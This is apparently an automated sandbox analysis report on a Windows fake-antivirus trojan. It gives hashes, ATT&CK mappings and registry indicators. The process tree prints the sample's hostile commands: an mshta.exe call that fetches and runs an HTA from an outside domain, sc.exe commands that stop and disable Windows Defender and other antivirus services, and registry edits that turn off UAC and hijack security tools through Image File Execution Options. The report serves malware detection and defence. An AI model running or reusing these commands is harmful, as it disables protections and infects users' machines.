a6e0ce289db711413ba5395a80e50a0ed95c3927448492d3ecde38506227c571

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
02-07-2024 14:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe
Size

2.0MB
MD5

1f9b619074e3ef7c19b296330e290dde
SHA1

8342d1aa1cef5d5d10ee68a4dfcca4de12599502
SHA256

a6e0ce289db711413ba5395a80e50a0ed95c3927448492d3ecde38506227c571
SHA512

3ae7ef2c3181b44816e0cb7186b113c8e99d97e06a56d7b4babf283cdc342f18273e39c66912c41bdbbabc62303bb8bb998cee9db0234847a521df46ae6784c6
SSDEEP

49152:DKqoP5uG7LG6sjWmlwsg7IklBKZICcDIGXQvh9zK4tMy+iZKnkJeYuFEb:DQP5uGvC9bg7DlBqICchX8W1iZgkJLuo

Score

10^/10

evasion execution persistence trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=35&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=vijldqbhas&14=1

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-gjse.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Protector-gjse.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	Protector-gjse.exe

Disables taskbar notifications via registry modification
evasion

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ethereal.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\homeav2010.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jdbgmrg.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsctool.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dssagent.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drweb32.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\killprocesssetup161.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QuickHealCleaner.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VisthUpd.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccevtmgr.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smrtdefp.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spyxx.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpdos32.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusPlus.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashUpd.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ave32.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\datemanager.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hxdl.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lnetinfo.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navstub.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qh.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ray.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vettray.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxfw.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prizesurfer.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgtray.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avnotify.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brastk.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfiaudit.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csc.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htpatch.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Identity.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luau.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\processmonitor.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setupvameeval.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sms.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswin9xe.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavpf.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bpc.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[3].exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcmgr.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibmavsp.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANToManager.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\upgrad.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zapro.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fprot.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fast.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intren.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\virusmdpersonalfirewall.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccapp.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jammer.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgscanx.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwinst4.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsAuxs.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafetyKeeper.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scam32.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgri32.exe	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe	Protector-gjse.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\snetcfg.exe\Debugger = "svchost.exe"	Protector-gjse.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsbgate.exe	Protector-gjse.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	f193n15598i0567.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	13tu7hiem9f2421.exe

Executes dropped EXE 3 IoCs

pid	Process
3668	f193n15598i0567.exe
600	13tu7hiem9f2421.exe
2844	Protector-gjse.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-gjse.exe"	Protector-gjse.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-gjse.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\services.msc	Protector-gjse.exe
File opened for modification	C:\Windows\SysWOW64\eventvwr.msc	Protector-gjse.exe
File opened for modification	C:\Windows\SysWOW64\diskmgmt.msc	Protector-gjse.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3652	sc.exe
2680	sc.exe
4344	sc.exe
2960	sc.exe
1692	sc.exe
3896	sc.exe
4984	sc.exe
2968	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312	Protector-gjse.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1"	Protector-gjse.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	600	13tu7hiem9f2421.exe
Token: SeShutdownPrivilege	600	13tu7hiem9f2421.exe
Token: SeDebugPrivilege	2844	Protector-gjse.exe
Token: SeShutdownPrivilege	2844	Protector-gjse.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
600	13tu7hiem9f2421.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe
2844	Protector-gjse.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 4904 wrote to memory of 3668	4904	1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe	80
PID 4904 wrote to memory of 3668	4904	1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe	80
PID 4904 wrote to memory of 3668	4904	1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe	80
PID 3668 wrote to memory of 600	3668	f193n15598i0567.exe	81
PID 3668 wrote to memory of 600	3668	f193n15598i0567.exe	81
PID 3668 wrote to memory of 600	3668	f193n15598i0567.exe	81
PID 600 wrote to memory of 2844	600	13tu7hiem9f2421.exe	82
PID 600 wrote to memory of 2844	600	13tu7hiem9f2421.exe	82
PID 600 wrote to memory of 2844	600	13tu7hiem9f2421.exe	82
PID 600 wrote to memory of 3576	600	13tu7hiem9f2421.exe	83
PID 600 wrote to memory of 3576	600	13tu7hiem9f2421.exe	83
PID 600 wrote to memory of 3576	600	13tu7hiem9f2421.exe	83
PID 2844 wrote to memory of 1616	2844	Protector-gjse.exe	85
PID 2844 wrote to memory of 1616	2844	Protector-gjse.exe	85
PID 2844 wrote to memory of 1616	2844	Protector-gjse.exe	85
PID 2844 wrote to memory of 2680	2844	Protector-gjse.exe	88
PID 2844 wrote to memory of 2680	2844	Protector-gjse.exe	88
PID 2844 wrote to memory of 2680	2844	Protector-gjse.exe	88
PID 2844 wrote to memory of 4344	2844	Protector-gjse.exe	89
PID 2844 wrote to memory of 4344	2844	Protector-gjse.exe	89
PID 2844 wrote to memory of 4344	2844	Protector-gjse.exe	89
PID 2844 wrote to memory of 3896	2844	Protector-gjse.exe	90
PID 2844 wrote to memory of 3896	2844	Protector-gjse.exe	90
PID 2844 wrote to memory of 3896	2844	Protector-gjse.exe	90
PID 2844 wrote to memory of 2960	2844	Protector-gjse.exe	92
PID 2844 wrote to memory of 2960	2844	Protector-gjse.exe	92
PID 2844 wrote to memory of 2960	2844	Protector-gjse.exe	92
PID 2844 wrote to memory of 1692	2844	Protector-gjse.exe	94
PID 2844 wrote to memory of 1692	2844	Protector-gjse.exe	94
PID 2844 wrote to memory of 1692	2844	Protector-gjse.exe	94
PID 2844 wrote to memory of 4984	2844	Protector-gjse.exe	96
PID 2844 wrote to memory of 4984	2844	Protector-gjse.exe	96
PID 2844 wrote to memory of 4984	2844	Protector-gjse.exe	96
PID 2844 wrote to memory of 2968	2844	Protector-gjse.exe	97
PID 2844 wrote to memory of 2968	2844	Protector-gjse.exe	97
PID 2844 wrote to memory of 2968	2844	Protector-gjse.exe	97
PID 2844 wrote to memory of 3652	2844	Protector-gjse.exe	98
PID 2844 wrote to memory of 3652	2844	Protector-gjse.exe	98
PID 2844 wrote to memory of 3652	2844	Protector-gjse.exe	98

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Protector-gjse.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-gjse.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Protector-gjse.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	Protector-gjse.exe

C:\Users\Admin\AppData\Local\Temp\1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1f9b619074e3ef7c19b296330e290dde_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4904
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe" -e -pm1it982889f9266
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:600
  - - C:\Users\Admin\AppData\Roaming\Protector-gjse.exe
      C:\Users\Admin\AppData\Roaming\Protector-gjse.exe
      4⤵
      UAC bypass
      Event Triggered Execution: Image File Execution Options Injection
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in System32 directory
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:2844
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta.exe "http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=35&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=vijldqbhas&14=1"
        5⤵
        
        PID:1616
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WinDefend
        5⤵
        Launches sc.exe
        
        PID:2680
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config WinDefend start= disabled
        5⤵
        Launches sc.exe
        
        PID:4344
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop msmpsvc
        5⤵
        Launches sc.exe
        
        PID:3896
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config msmpsvc start= disabled
        5⤵
        Launches sc.exe
        
        PID:2960
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config ekrn start= disabled
        5⤵
        Launches sc.exe
        
        PID:1692
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop AntiVirService
        5⤵
        Launches sc.exe
        
        PID:4984
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config AntiVirService start= disabled
        5⤵
        Launches sc.exe
        
        PID:2968
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config AntiVirSchedulerService start= disabled
        5⤵
        Launches sc.exe
        
        PID:3652
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\13TU7H~1.EXE" >> NUL
      4⤵
      PID:3576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe

Filesize
2.0MB

MD5
567b2b37131635dea665bca13f4999d8

SHA1
1585ba49f012492c92f69ff46a752e8f4ce26322

SHA256
bd887a86e92b97eea034dc5818aa270ff66b8a7571afa47d78a9390ec8f9d7af

SHA512
95e60c1275de2fbc8cd4a869562e4cd38b9d22f7ebdb2fbc80a72726d167f836aeb35913e39565da1dc7d2451f954ef1b0c8dc0c2c0aba40ffab4e5411b67fae

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe

Filesize
1.9MB

MD5
173a6177bb4785ddc32232299f49f6de

SHA1
a2c834008094e2dfb0404127fb787b6e6f13329c

SHA256
a283ff54ea50d76f1f5881584d3129b6d80457880244d532d0f81ac05cccc3af

SHA512
d39ded0bc757b94f3635648ed61c882b81df4fc64f4b895b50cd1811329c4737ff7d439b7cfbec4a29d3d426ac40d7d8891f7005f29f9dc91b2c558e7bd1757c

Download Submit
memory/600-18-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/600-28-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-36-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-38-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-39-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-40-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-41-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-42-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-44-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-45-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-46-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-47-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download
memory/2844-49-0x0000000000400000-0x0000000000805000-memory.dmp

Filesize
4.0MB

Download